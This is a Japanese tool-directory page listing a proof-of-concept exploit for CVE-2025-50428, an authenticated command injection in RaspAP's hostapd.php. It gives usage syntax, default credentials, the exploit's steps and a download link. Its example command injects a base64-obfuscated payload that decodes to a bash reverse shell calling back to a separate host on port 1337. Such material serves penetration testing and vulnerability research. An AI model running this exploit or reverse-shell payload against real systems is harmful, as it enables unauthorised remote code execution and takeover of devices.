Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/security-smarttecs/cve-2025-50428
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育
GitHubsecurity-smarttecs/cve-2025-50428

cve-2025-50428

CVE-2025-50428 の脆弱性の概念実証: RaspAP における認証済み OS コマンドインジェクション

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE Severity Product Version

CVE-2025-50428 - RaspAP コマンドインジェクション

CVE-2025-50428 の概念実証エクスプロイトです。RaspAP の raspap-webgui 3.2.9 以前に存在するコマンドインジェクションの脆弱性を悪用します。


脆弱性 IDCVE-2025-50428
深刻度高 (CVSS 3.1: 8.6)
CVSS ベクターCVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
脆弱性タイプコードインジェクション
攻撃経路リモート(認証済み)
必要な権限低
影響コード実行、権限昇格
影響を受ける製品raspap-webgui ≤ 3.2.9
発見者SmartTECS Cyber Security GmbH

説明

このエクスプロイトは、RaspAP の hostapd.php スクリプトにおけるコマンドインジェクションの脆弱性を標的としています。この脆弱性は、interface パラメータを介して渡されるユーザー入力のサニタイズが不適切であるために発生します。認証済みの攻撃者は任意の OS コマンドを注入でき、その結果、www-data ユーザーの権限でコードが実行される可能性があります。

影響を受けるバージョン

  • raspap-webgui ≤ 3.2.9

要件

  • Python 3.x
  • requests ライブラリがインストールされていること
  • 脆弱性のあるバージョンの RaspAP が稼働しているターゲット
  • 有効な RaspAP ログイン資格情報

使用方法

root@kitploit:~
python3 poc.py --base-url <url> --interface <payload> [--username <username>] [--password <password>]

パラメータ

  • --base-url: RaspAP インストールのベース URL(例: http://192.168.122.22)
  • --interface: interface パラメータに指定する値。インジェクションペイロードを指定可能
  • --username: RaspAP ユーザー名(デフォルト: admin)
  • --password: RaspAP パスワード(デフォルト: secret)

例

root@kitploit:~
python3 poc.py --base-url http://192.168.122.22 --interface "';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzEzMzcgMD4mMTs= | base64 -d | bash"

仕組み

  1. スクリプトは提供された資格情報を使用して RaspAP の Web インターフェースに認証します。
  2. サーバーから有効な CSRF トークンを取得します。
  3. 悪意のあるコマンドインジェクションペイロードを含む interface パラメータを指定して、hostapd.php に POST リクエストを送信します。
  4. 注入されたコマンドは、www-data 権限でターゲットシステム上で実行されます。

注意事項

  • このエクスプロイトには有効な資格情報が必要です。
  • 悪用に成功すると任意のコマンド実行が可能になり、権限昇格へと連鎖させることができます。

SmartTECS Cyber Security GmbH

SmartTECS Cyber Security GmbH は、ペネトレーションテスト、セキュアなソフトウェア開発、脆弱性調査を専門とするサイバーセキュリティ企業です。同社は、組織が重要システムを進化するサイバー脅威から保護できるよう、カスタマイズされたセキュリティ評価、インシデントレスポンス、戦略的アドバイザリーサービスを提供しています。

免責事項

このツールは教育および研究目的のみで提供されています。明示的な許可を得て所有または管理されているシステムでのみ使用してください。作者および SmartTECS Cyber Security GmbH は、誤用または損害について一切の責任を負いません。

参照

  • https://nvd.nist.gov/vuln/detail/CVE-2025-50428
ツールをダウンロード